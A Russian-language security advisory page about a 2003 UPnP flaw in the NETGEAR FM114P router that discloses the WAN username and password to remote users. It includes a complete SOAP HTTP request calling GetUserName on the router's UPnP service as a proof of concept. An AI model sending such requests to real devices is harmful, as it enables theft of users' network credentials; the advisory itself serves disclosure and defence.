Раскрытие пароля через UPNP в NETGEAR FM114P Wireless cable/DSL firewall router

Дата публикации:
09.04.2003
Дата изменения:
17.10.2006
Всего просмотров:
981
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в NETGEAR FM114P Wireless cable/DSL firewall router. Устройство может раскрыть информацию авторизации удаленному пользователю, когда используется Universal Plug and Play (UPNP).

Как сообщается, удаленный пользователь может вызвать UPNP SOAP запрос (GetUserName, GetPassword), чтобы получить WAN имя пользователя и пароль с устройства. Пример:

POST /upnp/service/WANPPPConnection HTTP/1.1
HOST: 192.168.0.1:80
SOAPACTION: "urn:schemas-upnp-org:service:WANPPPConnection:1#GetUserName"
CONTENT-TYPE: text/xml ; charset="utf-8"
Content-Length: 289

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
   <s:Body>
      <u:GetUserName
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1" />
   </s:Body>
</s:Envelope>
Уязвимость обнаружена в NETGEAR FM114P; Firmware 1.4 Beta Release 21

Ссылки: Another security problem in Netgear FM114P ProSafe Wireless Router firmware
или введите имя

CAPTCHA